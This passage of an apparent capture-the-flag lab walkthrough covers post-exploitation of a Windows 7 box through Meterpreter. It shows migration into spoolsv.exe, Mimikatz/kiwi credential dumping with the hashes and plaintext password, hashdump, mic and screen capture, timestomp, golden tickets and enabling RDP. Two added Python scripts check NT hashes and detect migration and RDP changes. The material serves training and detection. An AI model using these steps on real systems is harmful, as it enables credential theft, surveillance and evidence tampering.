 2728  692   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 2796  692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 2868  820   rundll32.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\rundll32.exe
 2904  2868  dinotify.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\dinotify.exe

In order to interact with lsass we need to be ‘living in’ a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this and it’ll restart if we crash it! What’s the name of the printer service?

spoolsv.exe

Mentioned within this question is the term ‘living in’ a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.

Migrate to this process now with the command migrate -N PROCESS_NAME.

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2456 to 1380...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Let’s check what user we are now with the command getuid. What user is listed?

NT AUTHORITY\SYSTEM

Now that we’ve made our way to full administrator permissions we’ll set our sights on looting. Mimikatz is a rather infamous password dumping tool that is incredibly useful. Load it now using the command load kiwi (Kiwi is the updated version of Mimikatz)

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.

Loading kiwi into our meterpreter session will expand our help menu, take a look at the newly added section of the help menu now via the command help.

meterpreter > help kiwi

Kiwi Commands
=============

    Command       Description
    -------       -----------
    creds_all     Retrieve all credentials (parsed)
    creds_kerber  Retrieve Kerberos creds (parsed)
    os
    creds_livess  Retrieve Live SSP creds
    p
    creds_msv     Retrieve LM/NTLM creds (parsed)
    creds_ssp     Retrieve SSP creds
    creds_tspkg   Retrieve TsPkg creds (parsed)
    creds_wdiges  Retrieve WDigest creds (parsed)
    t
    dcsync        Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm   Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticke  Create a golden kerberos ticket
    t_create
    kerberos_tic  List all kerberos tickets (unparsed)
    ket_list
    kerberos_tic  Purge any in-use kerberos tickets
    ket_purge
    kerberos_tic  Use a kerberos ticket
    ket_use
    kiwi_cmd      Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam  Dump LSA SAM (unparsed)
    lsa_dump_sec  Dump LSA secrets (unparsed)
    rets
    password_cha  Change the password/hash of a user
    nge
    wifi_list     List wifi profiles/creds for the current user
    wifi_list_sh  List shared wifi profiles/creds (requires SYSTEM)
    ared

Which command allows us to retrieve all credentials?

creds_all

Run this command now. What is Dark’s password? Mimikatz allows us to steal this password out of memory even without the user ‘Dark’ logged in, as there is a scheduled task that runs Icecast as the user ‘Dark’. It also helps that Windows Defender isn’t running on the box ;) (Take another look at the ps list: this box isn’t in the best shape, with both the firewall and Defender disabled.)

Password01!

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)
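
The msv row above is the NT hash LSASS held for Dark, and the wdigest and tspkg sections show the same secret in clear text. The script below is an added example, not code from this write-up or from Mimikatz: it implements MD4 and checks the NTLM column against a constructed candidate list, which is how a defender confirms which password a dumped account actually had without trusting the plaintext columns. The msv lines are copied from the creds_all output above; the candidate passwords are made up for the example.

```python
"""Verify the NTLM column of a Mimikatz msv dump against candidate passwords.

Added example, not code from the write-up or from Mimikatz. The NT hash that
LSASS keeps in memory (printed by creds_all as NTLM) is MD4 over the UTF-16LE
encoding of the password. MD4 is implemented here in pure Python because
OpenSSL 3 only ships it in the legacy provider, so hashlib.new("md4") often
raises ValueError on current systems.
"""
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest (16 bytes) of data."""
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)                       # padding: a 1 bit, then zeros to 56 mod 64
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)      # then the 64-bit little-endian bit length

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # (mixing function, round constant, message-word index for step i, shift table)
    rounds = (
        (f, 0x00000000, lambda i: i, (3, 7, 11, 19)),
        (g, 0x5A827999, lambda i: (i % 4) * 4 + i // 4, (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, lambda i: (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for func, const, word, shifts in rounds:
            for i in range(16):
                j = (-i) % 4               # step i updates a, d, c, b in turn
                mixed = v[j] + func(v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4]) + x[word(i)] + const
                v[j] = _rotl(mixed & MASK32, shifts[i % 4])
        state = [(s + t) & MASK32 for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT (NTLM) hash as Mimikatz prints it: MD4 of the UTF-16LE password, lowercase hex."""
    return md4(password.encode("utf-16le")).hex()


# The msv section exactly as creds_all printed it in the session above.
MSV_OUTPUT = """\
Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
"""


def parse_msv(text: str) -> list:
    """Turn the whitespace-aligned msv table into dicts, skipping the header and rule lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] in ("Username", "--------"):
            continue
        rows.append(dict(zip(("user", "domain", "lm", "ntlm", "sha1"), parts)))
    return rows


def match_candidates(rows: list, candidates: list) -> dict:
    """Map each dumped user to the candidate password whose NT hash equals its NTLM value."""
    by_hash = {nt_hash(p): p for p in candidates}
    matches = {}
    for r in rows:
        h = r["ntlm"].lower()
        if h in by_hash:
            matches[r["user"]] = by_hash[h]
    return matches


if __name__ == "__main__":
    # Constructed candidate list: the password the write-up found plus a decoy.
    print(match_candidates(parse_msv(MSV_OUTPUT), ["Winter2023!", "Password01!"]))
```

The plaintext in the wdigest section exists because Windows 7 caches logon credentials for the WDigest SSP; on Windows 7 with KB2871997, and on Windows 8.1 and later, setting UseLogonCredential to 0 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest removes it. The NT hash itself stays in LSASS regardless, which is why the migration step into a SYSTEM process matters and why LSASS protections (RunAsPPL, Credential Guard) are the next layer.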

Post-Exploitation

Explore post-exploitation actions we can take on Windows.

Before we start our post-exploitation, let’s revisit the help menu one last time in the meterpreter shell. We’ll answer the following questions using that menu.

What command allows us to dump all of the password hashes stored on the system? We won’t crack the Administrative password in this case as it’s pretty strong (this is intentional to avoid password spraying attempts)

hashdump

Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

While more useful when interacting with a machine being used, what command allows us to watch the remote user’s desktop in real time?

screenshare

Stdapi: User interface Commands
===============================
    Command       Description
    -------       -----------
    screenshare   Watch the remote user desktop in real time

How about if we wanted to record from a microphone attached to the system?

record_mic

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds

To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don’t ever do this on a pentest unless you’re explicitly allowed to do so! This is not beneficial to the defending team as they try to break down the events of the pentest after the fact.

timestomp

Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

Mimikatz allows us to create what’s called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?

Golden ticket attacks are a function within Mimikatz which abuses a component of Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.

golden_ticket_create

Kiwi Commands
=============

    Command       Description
    -------       -----------
    golden_ticke  Create a golden kerberos ticket
    t_create

One last thing to note. As we have the password for the user ‘Dark’ we can now authenticate to the machine and access it via remote desktop (MSRDP). As this is a workstation, we’d likely kick whatever user is signed onto it off if we connect to it, however, it’s always interesting to remote into machines and view them as their users do. If this hasn’t already been enabled, we can enable it via the following Metasploit module: run post/windows/manage/enable_rdp

meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20230729082734_default_10.10.184.85_host.windows.cle_785848.txt
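
Both the migration into spoolsv.exe earlier in the session and the enable_rdp run above leave traces a defender can hunt for. The script below is an added example, not code from this write-up, Metasploit or Sysmon: it runs four small detection rules over constructed records. The Sysmon field names it uses (SourceProcessId, TargetProcessId, SourceImage, TargetImage, TargetObject, Details, Image, CommandLine, ParentImage) are real; the keys for the System-log 7040 event (ServiceName, OldStartType, NewStartType) are my own simplification of that event's parameters. The process inventory mirrors the ps listing, with PIDs 2456 and 1380 taken from the migrate output and the remaining rows constructed; the netsh command line is a plausible placeholder, and fDenyTSConnections is the registry value Windows uses to deny RDP connections (it is not on the page, but it is what "Enabling Remote Desktop" changes).

```python
"""Hunt for the artefacts of process migration and of enabling RDP.

Added example, not code from the write-up, Metasploit or Sysmon. Four rules
run over constructed Sysmon-style and System-log records:

  * migrate -N spoolsv.exe appears as a CreateRemoteThread (Sysmon ID 8) from a
    user-context process into a SYSTEM-owned one.
  * post/windows/manage/enable_rdp appears as fDenyTSConnections set to 0
    (Sysmon ID 13), TermService switched to auto start (System log 7040) and
    netsh touching the firewall (Sysmon ID 1), all from the injected process.
"""
import re

SYSTEM_USER = r"NT AUTHORITY\SYSTEM"

# Process inventory in the shape of the `ps` listing. 2456 (powershell.exe, Dark) and
# 1380 (spoolsv.exe) are the PIDs in the migrate output; the rest is constructed.
PROCESS_INVENTORY = {
    2456: {"image": "powershell.exe", "arch": "x86", "user": r"Dark-PC\Dark"},
    1380: {"image": "spoolsv.exe",    "arch": "x64", "user": SYSTEM_USER},
    2868: {"image": "rundll32.exe",   "arch": "x64", "user": r"Dark-PC\Dark"},
}

# Constructed events. Field names follow Sysmon; the 7040 record is simplified.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceProcessId": 2456, "TargetProcessId": 1380,
     "SourceImage": r"C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\spoolsv.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 7040, "Channel": "System", "ServiceName": "TermService",
     "OldStartType": "demand start", "NewStartType": "auto start"},
    {"EventID": 1, "Image": r"C:\Windows\System32\netsh.exe",
     "ParentImage": r"C:\Windows\System32\spoolsv.exe",
     "CommandLine": 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
]


def rule_cross_privilege_remote_thread(ev, inventory):
    """A non-SYSTEM process starting a thread inside a SYSTEM process: injection/migration."""
    if ev.get("EventID") != 8:
        return None
    src = inventory.get(ev.get("SourceProcessId"), {})
    dst = inventory.get(ev.get("TargetProcessId"), {})
    if dst.get("user") == SYSTEM_USER and src.get("user") != SYSTEM_USER:
        return f"remote thread from {src.get('image')} ({src.get('user')}) into {dst.get('image')} (SYSTEM)"
    return None


def rule_rdp_registry_enabled(ev, inventory):
    """fDenyTSConnections written as 0 turns Remote Desktop on."""
    target = ev.get("TargetObject", "").lower()
    if ev.get("EventID") != 13 or not target.endswith(r"\terminal server\fdenytsconnections"):
        return None
    m = re.search(r"0x([0-9a-f]+)", ev.get("Details", ""), re.I)
    if m and int(m.group(1), 16) == 0:
        return f"fDenyTSConnections set to 0 by {ev.get('Image')}"
    return None


def rule_termservice_autostart(ev, inventory):
    """Service Control Manager 7040: TermService start type changed to auto start."""
    if (ev.get("EventID") == 7040 and ev.get("ServiceName") == "TermService"
            and ev.get("NewStartType") == "auto start"):
        return f"TermService start type changed from {ev.get('OldStartType')} to auto start"
    return None


def rule_netsh_rdp_firewall(ev, inventory):
    """netsh enabling a firewall rule for remote access, especially from an odd parent."""
    if ev.get("EventID") != 1 or not ev.get("Image", "").lower().endswith("netsh.exe"):
        return None
    cl = ev.get("CommandLine", "").lower()
    if "firewall" in cl and "remote" in cl and "enable" in cl:
        return f"netsh opened the firewall for remote access, parent {ev.get('ParentImage')}"
    return None


RULES = [rule_cross_privilege_remote_thread, rule_rdp_registry_enabled,
         rule_termservice_autostart, rule_netsh_rdp_firewall]


def run_rules(events, inventory):
    """Return (rule name, detail) for every event a rule fires on, in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev, inventory)
            if detail:
                alerts.append((rule.__name__, detail))
    return alerts


if __name__ == "__main__":
    for name, detail in run_rules(SAMPLE_EVENTS, PROCESS_INVENTORY):
        print(f"{name}: {detail}")
```

The join against a process inventory is what makes the first rule useful: Sysmon's event 8 tells you the two images, but whether the thread crosses a privilege boundary needs the owner of each PID, which here comes from the same kind of listing the write-up obtained with ps. The cleanup resource file Metasploit names in its output reverts the three RDP changes; if it is never run, the 7040 and registry artefacts are what remain on the host.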

Extra Credit

Explore manual exploitation via exploit code found on exploit-db.

Exploit link: https://www.exploit-db.com/exploits/568

As you advance in your pentesting skills, you will be faced eventually with exploitation without the usage of Metasploit. Provided above is the link to one of the exploits found on Exploit DB for hijacking Icecast for remote code execution. While not required by the room, it’s recommended to attempt exploitation via the provided code or via another similar exploit to further hone your skills.